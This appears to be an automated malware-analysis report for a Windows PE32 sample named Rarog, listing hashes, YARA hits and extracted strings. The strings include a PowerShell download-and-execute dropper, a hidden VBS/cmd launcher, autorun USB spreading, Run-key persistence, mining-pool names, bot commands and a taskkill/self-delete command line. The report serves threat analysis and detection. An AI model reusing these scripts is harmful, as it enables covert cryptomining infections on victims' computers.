Sample details: 72b28b7ba9db706cdaf4b54971860cca --

Hashes
MD5: 72b28b7ba9db706cdaf4b54971860cca
SHA1: 093f8e75cf96e57129e9d6500731e8af375a784a
SHA256: 2385ae0c295eb7f880ec799e782aa07821cfa19f6de586de094bf0c70425ccba
SSDEEP: 12288:3qA1lHUWbUwhKqtV7hygDY4HohcB7YLywc5YTkuuXLMTaO:9M0RBpygDFX5YLywDQ7v
Details
File Type: PE32
Yara Hits
YRP/VC8_Microsoft_Corporation | YRP/Obsidium_v10059_Final | YRP/Microsoft_Visual_Cpp_8 | YRP/IsPE32 | YRP/IsWindowsGUI | YRP/HasDebugData | YRP/HasRichSignature | YRP/powershell | YRP/maldoc_find_kernel32_base_method_1 | YRP/domain | YRP/contentis_base64 | YRP/System_Tools | YRP/Dropper_Strings | YRP/WMI_strings | YRP/Misc_Suspicious_Strings | YRP/DebuggerCheck__QueryInfo | YRP/anti_dbg | YRP/network_tcp_socket | YRP/spreading_file | YRP/win_registry | YRP/win_files_operation | YRP/BASE64_table | YRP/Str_Win32_Winsock2_Library | YRP/Str_Win32_Http_API |
Strings
		!This program cannot be run in DOS mode.
`.rdata
@.data
@.reloc
?RPQWj
WWWQh\
VVVVVVW
u0h@@@
D$ _^[
D$ _^[
D$$j@P
D$$j@P
D$ j@P
D$ j@P
9E$WWV
t,WW9}
QQSVWd
URPQQh
;t$,v-
UQPXY]Y[
YYhH#E
t#Vh\_E
u0jAXf;
u0jAXf;
u!hXcE
&sWj5X
ujhDcE
u7hDcE
PPPPPPPP
F4_^[]
Tt1jhZ;
Tt1jhZ;
^$+^8+
t	j-Xf
N2jx_f;
~$+~8+
t	j-Xf
N2jx_f;
~$+~8+
F2jgYf;
< t1<	t-
tyPVj@W
_tcPVj@
u#j,Xf;
aShX~E
>=upF8
Wj0XPS
SSSPSW
u-PSSW
SSVWh 
f9:t!V
QQSWj0j@
u	!FX@
u^9^\t/
VX9^`tT
;N\u\W
j	PjYV
u2Vj@h8
9C`u99C\t4
9C`u5Wj
PVSQSWV
PPPPPWS
PP9E u:PPVWP
(HXt9f
rr	jrZ
rr	jrZ
PPPPPPPP
SWhxnC
Wj4XPV
OHSSVSSW
A(;A,v
O,9O(vV
+A Vj$
+AHVj(
FT9~Xt0
@(;A(s
+A$tU3
G(9_Lu8
;Q u	;A
eSPPWh
FYY;w(|
FY;w(|
9V(~?j
V<;V8}	
YYF;w,|
G@WVPR
Q;FD~Z
4Q;FD~Z
C8;sx|
tWVWj>
9V(~?j
V<;V8}	
j,h(tF
tB;wPt
n;w0tc
E;w0tLj
5;{0t?
FP;FL~
Q;FD~R
t]VWj>
}:;2|6
9xdtUW
x(kP$4
kW$4k_(4
AHkO($
Q;FD~R
t]VWj>
FY;w(|
9V(~?j
V<;V8}	
O`j@SV
FY;w(|
Q;FD~R
FYY;w(|
FY;w(|
9V(~>j
V<;V8}	
9V(~Bj
V<;V8}	
Q;FD~R
FP;FL~
C,H_^u
tO9xp~J
u28C`t
v	N+D$
v	N+D$
bad allocation
bad array new length
unknown error
device or resource busy
invalid argument
no such process
not enough memory
operation not permitted
resource deadlock would occur
resource unavailable try again
address family not supported
address in use
address not available
already connected
argument list too long
argument out of domain
bad address
bad file descriptor
bad message
broken pipe
connection aborted
connection already in progress
connection refused
connection reset
cross device link
destination address required
directory not empty
executable format error
file exists
file too large
filename too long
function not supported
host unreachable
identifier removed
illegal byte sequence
inappropriate io control operation
interrupted
invalid seek
io error
is a directory
message size
network down
network reset
network unreachable
no buffer space
no child process
no link
no lock available
no message available
no message
no protocol option
no space on device
no stream resources
no such device or address
no such device
no such file or directory
not a directory
not a socket
not a stream
not connected
not supported
operation canceled
operation in progress
operation not supported
operation would block
owner dead
permission denied
protocol error
protocol not supported
read only file system
result out of range
state not recoverable
stream timeout
text file busy
timed out
too many files open in system
too many files open
too many links
too many symbolic link levels
value too large
wrong protocol type
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
InitOnceExecuteOnce
CreateEventExW
CreateSemaphoreW
CreateSemaphoreExW
CreateThreadpoolTimer
SetThreadpoolTimer
WaitForThreadpoolTimerCallbacks
CloseThreadpoolTimer
CreateThreadpoolWait
SetThreadpoolWait
CloseThreadpoolWait
FlushProcessWriteBuffers
FreeLibraryWhenCallbackReturns
GetCurrentProcessorNumber
CreateSymbolicLinkW
GetCurrentPackageId
GetTickCount64
GetFileInformationByHandleEx
SetFileInformationByHandle
GetSystemTimePreciseAsFileTime
InitializeConditionVariable
WakeConditionVariable
WakeAllConditionVariable
SleepConditionVariableCS
InitializeSRWLock
AcquireSRWLockExclusive
TryAcquireSRWLockExclusive
ReleaseSRWLockExclusive
SleepConditionVariableSRW
CreateThreadpoolWork
SubmitThreadpoolWork
CloseThreadpoolWork
CompareStringEx
GetLocaleInfoEx
LCMapStringEx
0123456789abcdefghijklmnopqrstuvwxyz
0123456789abcdefghijklmnopqrstuvwxyz
bad exception
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__ptr64
__restrict
__unaligned
restrict(
 delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
 new[]
 delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator "" 
operator co_await
 Type Descriptor'
 Base Class Descriptor at (
 Base Class Array'
 Class Hierarchy Descriptor'
 Complete Object Locator'
CorExitProcess
`h````
xpxxxx
`h`hhh
xwpwpp
(null)
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
[aOni*{
~ $s%r
@b;zO]
v2!L.2
AreFileApisANSI
EnumSystemLocalesEx
GetActiveWindow
GetDateFormatEx
GetLastActivePopup
GetProcessWindowStation
GetTimeFormatEx
GetUserDefaultLocaleName
GetUserObjectInformationW
IsValidLocaleName
LCIDToLocaleName
LocaleNameToLCID
MessageBoxA
MessageBoxW
RoInitialize
RoUninitialize
AppPolicyGetProcessTerminationMethod
AppPolicyGetThreadInitializationType
AppPolicyGetShowDeveloperDiagnostic
AppPolicyGetWindowingModel
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
UTF-16LEUNICODE
NAN(SNAN)
nan(snan)
NAN(IND)
nan(ind)
_hypot
_nextafter
1#QNAN
1#SNAN
]vQ<)8
|)P!?Ua0
Eb2]A=
u?^p?o4
y1~?|"
?|I7Z#
>,'1D=
?g)([|X>=
:h"?bC
@H#?43
Ax#?uN}*
r7Yr7=
F0$?3=1
H`$?h|
&?~YK|
sU0&?W
<8bunz8
?#%X.y
F||<##
<@En[vP
?5Wg4p
"B <1=
pEvents
Lock already taken
SetThreadGroupAffinity
GetThreadGroupAffinity
GetCurrentProcessorNumberEx
GetLogicalProcessorInformationEx
pScheduler
version
eventObject
ppVirtualProcessorRoots
SchedulerKind
MaxConcurrency
MinConcurrency
TargetOversubscriptionFactor
LocalContextCacheSize
ContextStackSize
ContextPriority
SchedulingProtocol
DynamicProgressFeedback
WinRTInitialization
MaxPolicyElementKey
Mbp?333333
pContext
pExecutionResource
RegisterTraceGuidsW
UnregisterTraceGuids
TraceEvent
GetTraceLoggerHandle
GetTraceEnableLevel
GetTraceEnableFlags
pThreadProxy
switchState
Access violation - no RTTI data!
Bad dynamic_cast!
<8bunz8
l,kg<i
<@En[vP
invalid string position
string too long
Unknown exception
bad locale name
generic
iostream
iostream stream error
ios_base::badbit set
ios_base::failbit set
ios_base::eofbit set
invalid stoi argument
stoi argument out of range
YXBpLm9kbWVuYXJtaTl6LnNpdGU=
c3VjY2Vzcw==
C:\ProgramData\MicrosoftCorporation\Windows\Modules\
Instance
C:\ProgramData\MicrosoftCorporation\Windows\Modules
autorun.inf
autorun.exe
[Autorun]
open = autorun.exe
C:\ProgramData\{4FCEED6C-B7D9-405B-A844-C3DBF418BF87}\driver.dat
/2.0/method/info
minergate
stratum
cryptonight
monerohash
nicehash
dwarfpool
suprnova
nanopool
xmrpool
/2.0/method/checkConnection
profile=
/2.0/method/error
{EXE_NAME}
{EXE_PATH}
C:\ProgramData\WindowsAppCertification
WindowHelperStorageHostSystemThread.ps1
/2.0/method/update'
$furl = 'http://
C:\ProgramData\WindowsAppCertification\
$path = 'C:\ProgramData\MicrosoftCorporation\Windows\System32\'
$fpath = $path + 'Isass.exe'
$isfile = Test-Path $fpath 
if($isfile -eq 'True') {}
New-Item -ItemType directory -Path $path
$WebClient = New-Object System.Net.WebClient
$WebClient.DownloadFile($furl,$fpath)
Start-Process -FilePath $fpath}
C:\ProgramData\WindowsAppCertification\checker.vbs
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "C:\ProgramData\WindowsAppCertification\cert.cmd",0
C:\ProgramData\WindowsAppCertification\cert.cmd
@echo off
powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoP -file C:\ProgramData\WindowsAppCertification\WindowHelperStorageHostSystemThread.ps1
C:\ProgramData\MicrosoftCorporation\Windows\Helpers\SecurityHeaIthService.exe
C:\ProgramData\MicrosoftCorporation\Windows\Helpers\SystemldleProcess.exe
C:\ProgramData\MicrosoftCorporation\Windows\Helpers\winIogon.exe
C:\ProgramData\{CB28D9D3-6B5D-4AFA-BA37-B4AFAABF70B8}
C:\ProgramData\{CB28D9D3-6B5D-4AFA-BA37-B4AFAABF70B8}\
/2.0/method/config
/4.0/method/cores
/4.0/method/blacklist
/2.0/method/delay
NetMonitor
Process Killer
KillProcess
System Explorer
Process Explorer
Process Hacker
{THREADS}
/c taskkill /im 
C:\ProgramData\MicrosoftCorporation\Windows\System32\_Isass.exe
Software\Microsoft\Windows\CurrentVersion\Run
Windows_Antimalware_Host_Syst
C:\ProgramData\{4FCEED6C-B7D9-405B-A844-C3DBF418BF87}
/c timeout 5 & taskkill /im Isass.exe /f & erase C:\ProgramData\MicrosoftCorporation\Windows\System32\Isass.exe & RMDIR /s/q "C:\ProgramData\MicrosoftCorporation" & exit
&build=
/2.0/method/setOnline
install
open_url
update
restart_bot
delete_bot
/c start 
&videocard=
&processor=
&platform=
&profile=
&hwid=
buildID=
/4.0/method/installSuccess
C:\ProgramData\MicrosoftCorporation\Windows\System32\Isass.exe
/4.0/method/check
/4.0/method/threads
/2.0/method/get
/4.0/method/modules
/5.1/method/installError
C:\ProgramData\MicrosoftCorporation
C:\ProgramData\MicrosoftCorporation\Windows
C:\ProgramData\MicrosoftCorporation\Windows\System32
Unknown
SELECT * FROM Win32_OperatingSystem
SELECT * FROM Win32_Processor
NtQueryInformationProcess
ntdll.dll
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
 & exit
 /f & erase 
RSDS<e
E:\_Rarog\Release\Rarog.pdb
.text$di
.text$mn
.text$x
.text$yd
.idata$5
.00cfg
.CRT$XCA
.CRT$XCAA
.CRT$XCC
.CRT$XCL
.CRT$XCU
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XPA
.CRT$XPB
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$r
.rdata$sxdata
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.data$r
.rsrc$01
.rsrc$02
CreateThread
WriteFile
CreateFileW
MultiByteToWideChar
GetLastError
CloseHandle
CreateDirectoryW
GetModuleFileNameA
TerminateProcess
GetModuleFileNameW
OpenProcess
SetFileAttributesW
GetLogicalDriveStringsW
CreateToolhelp32Snapshot
CopyFileA
Process32NextW
DeleteFileA
Process32FirstW
LoadLibraryW
SetFileAttributesA
SetCurrentDirectoryW
GetProcAddress
RemoveDirectoryA
GetCurrentProcessId
FreeLibrary
CopyFileW
CreateDirectoryA
GetDriveTypeW
GetCurrentProcess
GetSystemInfo
IsWow64Process
K32GetModuleFileNameExW
GetModuleHandleA
K32GetModuleBaseNameW
ReadProcessMemory
WideCharToMultiByte
K32EnumProcessModules
KERNEL32.dll
GetForegroundWindow
GetWindowTextA
MessageBoxW
EnumDisplayDevicesW
USER32.dll
RegDeleteValueA
RegOpenKeyExA
GetCurrentHwProfileW
SetKernelObjectSecurity
ConvertStringSecurityDescriptorToSecurityDescriptorW
RegOpenKeyExW
RegSetValueExA
RegCloseKey
ADVAPI32.dll
ShellExecuteW
SHFileOperationW
SHELL32.dll
CoUninitialize
CoCreateInstance
CoSetProxyBlanket
CoInitializeSecurity
CoInitializeEx
ole32.dll
OLEAUT32.dll
WS2_32.dll
WinHttpQueryDataAvailable
WinHttpConnect
WinHttpSendRequest
WinHttpCloseHandle
WinHttpOpenRequest
WinHttpReadData
WinHttpOpen
WinHttpReceiveResponse
WINHTTP.dll
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsProcessorFeaturePresent
IsDebuggerPresent
GetStartupInfoW
GetModuleHandleW
QueryPerformanceCounter
GetCurrentThreadId
GetSystemTimeAsFileTime
InitializeSListHead
EnterCriticalSection
LeaveCriticalSection
TryEnterCriticalSection
DeleteCriticalSection
DuplicateHandle
WaitForSingleObjectEx
GetCurrentThread
SetLastError
InitializeCriticalSectionAndSpinCount
CreateEventW
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
GetTickCount
EncodePointer
DecodePointer
LCMapStringW
GetLocaleInfoW
GetStringTypeW
GetCPInfo
LocalFree
RtlUnwind
RaiseException
InterlockedPushEntrySList
InterlockedFlushSList
LoadLibraryExW
ExitProcess
GetModuleHandleExW
GetStdHandle
GetFileType
WriteConsoleW
GetACP
HeapAlloc
HeapFree
ExitThread
FreeLibraryAndExitThread
HeapReAlloc
FlushFileBuffers
GetConsoleCP
GetConsoleMode
OutputDebugStringW
IsValidLocale
GetUserDefaultLCID
EnumSystemLocalesW
ReadFile
SetFilePointerEx
FindClose
FindFirstFileExA
FindNextFileA
IsValidCodePage
GetOEMCP
GetCommandLineA
GetCommandLineW
GetEnvironmentStringsW
FreeEnvironmentStringsW
GetProcessHeap
SetStdHandle
ReadConsoleW
HeapSize
SetEndOfFile
CreateTimerQueue
SetEvent
SignalObjectAndWait
SwitchToThread
SetThreadPriority
GetThreadPriority
GetLogicalProcessorInformation
CreateTimerQueueTimer
ChangeTimerQueueTimer
DeleteTimerQueueTimer
GetNumaHighestNodeNumber
GetProcessAffinityMask
SetThreadAffinityMask
RegisterWaitForSingleObject
UnregisterWait
GetThreadTimes
GetVersionExW
VirtualAlloc
VirtualProtect
VirtualFree
ReleaseSemaphore
InterlockedPopEntrySList
QueryDepthSList
UnregisterWaitEx
Copyright (c) by P.J. Plauger, licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED.
                          
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
                          
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AVtype_info@@
.?AVbad_alloc@std@@
.?AVbad_array_new_length@std@@
.?AVinvalid_argument@std@@
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVout_of_range@std@@
.?AVstl_condition_variable_interface@details@Concurrency@@
.?AVstl_condition_variable_vista@details@Concurrency@@
.?AVstl_condition_variable_win7@details@Concurrency@@
.?AVstl_condition_variable_concrt@details@Concurrency@@
.?AV_Locimp@locale@std@@
.?AVstl_critical_section_interface@details@Concurrency@@
.?AVstl_critical_section_vista@details@Concurrency@@
.?AVstl_critical_section_win7@details@Concurrency@@
.?AVstl_critical_section_concrt@details@Concurrency@@
.?AV_com_error@@
.?AVbad_exception@std@@
.?AVWaitBlock@details@Concurrency@@
.?AVSingleWaitBlock@details@Concurrency@@
.?AVMultiWaitBlock@details@Concurrency@@
.?AVWaitAllBlock@details@Concurrency@@
.?AVWaitAnyBlock@details@Concurrency@@
.?AVTimedSingleWaitBlock@details@Concurrency@@
.?AV?$_MallocaArrayHolder@PAVContext@Concurrency@@@details@Concurrency@@
.?AVimproper_lock@Concurrency@@
.?AVscheduler_resource_allocation_error@Concurrency@@
.?AVunsupported_os@Concurrency@@
.?AVinvalid_operation@Concurrency@@
.?AVResourceManager@details@Concurrency@@
.?AUIResourceManager@Concurrency@@
.?AUITopologyExecutionResource@Concurrency@@
.?AUITopologyNode@Concurrency@@
.?AUTopologyObject@GlobalCore@details@Concurrency@@
.?AUTopologyObject@GlobalNode@details@Concurrency@@
.?AVscheduler_worker_creation_error@Concurrency@@
.?AVimproper_scheduler_reference@Concurrency@@
.?AVimproper_scheduler_attach@Concurrency@@
.?AVScheduleGroupBase@details@Concurrency@@
.?AVScheduleGroup@Concurrency@@
.?AVCacheLocalScheduleGroup@details@Concurrency@@
.?AVFairScheduleGroup@details@Concurrency@@
.?AVSchedulerBase@details@Concurrency@@
.?AVScheduler@Concurrency@@
.?AU_Chore@details@Concurrency@@
.?AVRealizedChore@details@Concurrency@@
.?AVCacheLocalScheduleGroupSegment@details@Concurrency@@
.?AVScheduleGroupSegmentBase@details@Concurrency@@
.?AVFairScheduleGroupSegment@details@Concurrency@@
.?AVcontext_unblock_unbalanced@Concurrency@@
.?AVcontext_self_unblock@Concurrency@@
.?AVmissing_wait@Concurrency@@
.?AVinvalid_scheduler_policy_key@Concurrency@@
.?AVinvalid_scheduler_policy_value@Concurrency@@
.?AVinvalid_scheduler_policy_thread_specification@Concurrency@@
.?AVnested_scheduler_missing_detach@Concurrency@@
.?AVinvalid_oversubscribe_operation@Concurrency@@
.?AVContextBase@details@Concurrency@@
.?AVContext@Concurrency@@
.?AV_Interruption_exception@details@Concurrency@@
.?AV_RefCounter@details@Concurrency@@
.?AV_CancellationTokenRegistration@details@Concurrency@@
.?AVCancellationTokenRegistration_TaskProc@details@Concurrency@@
.?AV?$_MallocaArrayHolder@PAVevent@Concurrency@@@details@Concurrency@@
.?AVExecutionResource@details@Concurrency@@
.?AUIExecutionResource@Concurrency@@
.?AVSchedulerProxy@details@Concurrency@@
.?AUISchedulerProxy@Concurrency@@
.?AVFreeThreadProxy@details@Concurrency@@
.?AVThreadProxy@details@Concurrency@@
.?AUIThreadProxy@Concurrency@@
.?AUIThreadProxyFactory@details@Concurrency@@
.?AVFreeThreadProxyFactory@details@Concurrency@@
.?AV?$ThreadProxyFactory@VFreeThreadProxy@details@Concurrency@@@details@Concurrency@@
.?AVVirtualProcessor@details@Concurrency@@
.?AVInternalContextBase@details@Concurrency@@
.?AUIExecutionContext@Concurrency@@
.?AVExternalContextBase@details@Concurrency@@
.?AVThreadScheduler@details@Concurrency@@
.?AUIScheduler@Concurrency@@
.?AVThreadInternalContext@details@Concurrency@@
.?AVVirtualProcessorRoot@details@Concurrency@@
.?AUIVirtualProcessorRoot@Concurrency@@
.?AVFreeVirtualProcessorRoot@details@Concurrency@@
.?AVThreadVirtualProcessor@details@Concurrency@@
.?AV_Ref_count_base@std@@
.?AV?$_Ref_count_obj_alloc@V__ExceptionPtr@@U?$_StaticAllocator@H@@@std@@
.?AV?$_Ref_count_obj@V__ExceptionPtr@@@std@@
.?AV__non_rtti_object@std@@
.?AVbad_typeid@std@@
.?AVfailure@ios_base@std@@
.?AV?$basic_filebuf@DU?$char_traits@D@std@@@std@@
.?AVruntime_error@std@@
.?AV?$codecvt@DDU_Mbstatet@@@std@@
.?AVios_base@std@@
.?AVerror_category@std@@
.?AV?$ctype@D@std@@
.?AVsystem_error@std@@
.?AVcodecvt_base@std@@
.?AV_Facet_base@std@@
.?AV_Generic_error_category@std@@
.?AU_Crt_new_delete@std@@
.?AV?$_Iosb@H@std@@
.?AV?$basic_ofstream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_streambuf@DU?$char_traits@D@std@@@std@@
.?AV?$_LaunchPad@V?$unique_ptr@V?$tuple@P6AXXZ@std@@U?$default_delete@V?$tuple@P6AXXZ@std@@@2@@std@@@std@@
.?AV?$_LaunchPad@V?$unique_ptr@V?$tuple@P6AXV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@ZV12@@std@@U?$default_delete@V?$tuple@P6AXV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@ZV12@@std@@@2@@std@@@std@@
.?AV_Iostream_error_category@std@@
.?AVbad_cast@std@@
.?AUctype_base@std@@
.?AV?$basic_ios@DU?$char_traits@D@std@@@std@@
.?AVfacet@locale@std@@
.?AV_Pad@std@@
.?AV?$basic_ostream@DU?$char_traits@D@std@@@std@@
.?AV_System_error@std@@
.?AVexception@std@@
.?AV?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@
.?AV?$basic_ifstream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_stringbuf@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@
.?AV?$basic_iostream@DU?$char_traits@D@std@@@std@@
.?AV?$numpunct@D@std@@
.?AV?$basic_istream@DU?$char_traits@D@std@@@std@@
.?AV?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
      <requestedPrivileges>
        <requestedExecutionLevel level='asInvoker' uiAccess='false' />
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>
0(040@0L0X0b0q0}0
1!1(1U1}1
=H=O=`=~=
=@?J?X?
2#222e2
<6=E=a=
0R1f1r1
373l3"4'4,4I4y4
9'9<9J9_9m9
:3:F:v:
:2;<;\;
;K<"=)=2=>=
>>?P?Z?e?
2<3C3U3h3
3x3O4T4
;,;C;I;P;V;];
;,<7>u>
>&?^?w?
2#2U2}2
4 4C4^4
666^6m6s6
697I7a7n7
;'<@<l=
>)?U?n?
12282B2a2t3H4j4~4
4	5-5Q5u5
282a2f2p2
3 3)3.3;3@3E3J3U3Z3_3d3n3s3{3
3'4,444N4d4
575A5y5
98:<:@:D:H:y:
;$;);.;;;@;`;|;
<==K=q=w=
1)1.191I1[1`1k1{1
5Q6V6`6
7 7)7.7P7T7X7\7`7v7
;Y<`<m<t<
8k8r8w8|8
:':N:o:
9J9P9V<c<x<
=$=F=e=
> >:>v>
8F8T8j8
:7;];~;
2&454d4j4}4
:&;5;V<e<&=8=1>
<$<D<\<e<k<
<%=A=X=
0-080`0i0:1`1p1{1
<8<a<z<
=@=P=[=
>F?X?}?
0>0C0H0P0W0j0
2I2y2f3s3
494L4c4
1:2X2s2
2J3O3h3p3v3{3
566H6_7
:E;M;v<
60E0j2v5
151<1B1G1U1
8?8E8K8Q8W8]8d8k8r8y8
9F9L9R9X9^9d9k9r9y9
;.;D;[;p;w;};
<+<3<L<
<8=c=x=}=
?*?G?Z?h?
"0+030o0
122J2P2
3.373D3\3
4A4F4y4
5+5J5j5
5^6h6r6
6B9J9Z9
9*:0:5:R:
; ;I;W;
= =2=G=L=y=
0P0\0c0
2'2:2G2X2x2
3	414]4
5[6b6i6p6}6
:%:+:1:6:<:B:H:M:S:Y:_:d:j:p:v:{:
;!;(;.;3;9;?;E;J;P;V;\;a;g;m;s;x;~;
<%<+<0<6<<<B<G<M<S<Y<^<d<j<p<u<{<
="=(=-=3=9=?=D=J=P=V=[=i=o=
>;>e>k>
?3?=?C?V?d?j?
090I0O0h0n0
1	1%1+1D1J1h1n1
2,2I2Z2`2f2m2z2
8,8K8n8
8&9>9C9
>&?k?p?t?x?|?
: :$:3:T:b:h:
;&;4;E;V;b;s;
949G9a9|9
:&:Y:c:u:~:
;A;M;R;W;~;
<"<.<U<a<~=
1#1*131v1
3V3h3p3z3
9H:M:T:x:
;.;=;K;W;c;q;
253L3J4
788X8@9Y:
8(8<8U8
	0!0N0i0y0~0
4,4t4x4
5#5)545:5H5f5
6"6.666N6s6
7<8P8l8
8(9A9F9O9
:8:C:M:\:d:l:\;
062<2N2Y2
9E:q:z:
<+=2===K=R=X=s=z=
575I5P5
5%6;6y6
8&8C8j8
9(989E9n9w9
:%:G:X:i:
0"1Y1k1
2,2D2w2
8/9L9k9
1)1.1a1m1u1
2#2(2-2=2B2G2W2\2a2q2v2{2
3#313=3I3]3s3
4/4C4N4S4X4u4
5#5H5S5X5]5z5
6C6N6S6X6s6}6
7)7E7P7U7Z7x7
8%8G8R8W8\8}8
:/:N:Y:d:i:n:
:];h;m;r;
<%<*</<I<N<S<o<
=.=D=Q=V=d=
0#1U1w1B2s3
7d9k9q9
< <s<x<}<
050S0q0
1B4]95<t<{<
1P5S6d6G8R8b8
<P=w=&>
?!?;?J?T?a?k?{?
0&082e2
3C3L3P3V3Z3`3d3n3
6$6)6r6
6d7k7u7
:+:H:P:y:
:0;7;@;j;};
<%<W<m<
=W=i={=
2/2A2S2
2S4Z4b4j4r4,859v9
k2?3u3
0B1G1s1{1
2'202;2C2a2m2
6D6h6q6|6
)0F0V0
2-252E2V2
7;7H7W7
<	=&=:=\=f=
;$<V<p<
669+:3:j:q:q=
4o7u7c;
0)1/141;1K1Y1j1
2\4x4R5
686C6P6b6
6G7\7e7n7
9*929O9_9k9z9e:
? ?%?+?=?E?V?^?g?x?
9+:8:m:z:)<E<U<u<
>Y>d>p>
2C3!464O4
5>5L5v5
6A6G6R6s6
7.7d7~7
9)979?9K9V9v9
:3:=:M:
:5;G;Z;h;m;
>	? ?5?S?b?x?
(040i0x0
6A7K7X7
819B9N9n9
9/:;:N:X:l:
:K;W;e;k;r;
>'>->E>
3)3/3K3h3
4!4I4c4
5"5.5F5L5V5i5
090?0o0!2
3 6<6^6v6
:@;s;!<@<
=!=/=5=	>C>
[0h0u0
181Q1k1y1
2A3H3S3a3u3
4/5R5u5
8P9]9n9
<.<8<E<O<Z<m<~<
5$6F6Q6n6t6
071>3c3<5C5N5Z5`5
888E8`8
8+9D9_9
=U>Z>a>o>
A0K0]0j0|0
6A7R7g7~7
7	8#8@8T8d8
:::o:{:
P0k0S4s4h6
8Q:k:w:
011>1J1
1l2x2E4:5G6v6\7x7
>$?(?,?0?4?8?<?@?D?H?z?
:(:1:N:b:
;8;o;~;
<7<Z<t<
<W=o=x=
0$0.0;0E0R0\0
1%1+1A1g1}1
3"3(393D3
3O4\4p4
<><M<[<H>
7D8_8z8
6&6V6i:{:
063C3g3~3
;0<9<W<b<k<
>2>B>H>N>Z>g>
797V7x7
:);P;n;{;7<r=
=+>8>`>
?+?<?J?a?g?
;7\7w7
9?96;;;M;k;
0070W0
536A6K6W6j6
6O7v7|7
0,161w1
1&2.262>2~2
2F394L4x4
586H6T6f6v6
8,9R9r9
9":o:#;};:<h=
9":B:l:
3'3J3z3
3-4H4z4
4(5C5f5
9*:E:h:
;';O;r;
<$=W=z=
?$?G?u?
1$121=1z1
3 3$3034383<3P3T3X3\3`3d3h3l3p3t3
4 4$4(4,4044484<4@4D4H4L4P4T4X4\4`4d4h4l4p4t4x4|4
4p5t5x5|5
9$9,949<9D9L9T9\9d9l9t9|9
:$:,:4:<:D:L:T:\:d:l:t:|:
0h4l4p4t4x4|4
8$8,848<8D8L8T8\8d8l8t8|8
9$9,949<9D9L9T9\9d9l9t9|9
:$:,:4:<:D:L:T:\:d:l:t:|:
;$;,;4;<;D;L;T;\;d;l;t;|;
<$<,<4<<<D<L<T<\<d<l<t<|<
=$=,=4=<=D=L=T=\=d=l=t=|=
>$>,>4><>D>L>T>\>d>l>t>|>
? ?(?0?8?@?H?P?X?`?h?p?x?
0 0(00080@0H0P0X0`0h0p0x0
1 1(10181@1H1P1X1`1h1p1x1
2 2(20282@2H2P2X2`2h2p2x2
3 3(30383@3H3P3X3`3h3p3x3
4 4(40484@4H4P4X4`4h4p4x4
5 5(50585@5H5P5X5`5h5p5x5
8 8$8(8,8084888<8@8D8H8L8P8T8X8\8`8d8h8l8p8t8x8|8
9 9$9(9,9094989<9@9D9H9L9P9T9X9\9`9d9h9
5 5$5(5,5054585<5D5H5L5P5T5X5\5`5l5t5|5
6 6$6(6,6064686<6@6D6H6L6P6T6
9 9$9(9,9
3 3$3(3,3034383<3@3D3H3L3P3T3X3\3`3d3h3l3p3t3x3|3
4 4$4(4,4044484<4@4D4H4L4P4T4X4\4`4d4h4l4p4t4x4
5$5,545<5D5L5T5\5d5l5t5|5
80D0P0\0h0t0
1(141@1L1X1d1p1|1
2$202<2H2T2`2l2x2
3 3,383H3T3`3l3x3
4 4,484D4P4
5D6L6T6\6d6l6t6|6
7$7,747<7D7L7T7\7d7l7t7|7
8$8,848<8D8L8T8\8d8l8t8|8
9$9,949<9D9L9T9\9d9l9t9|9
:$:,:4:<:D:L:T:\:d:l:t:|:
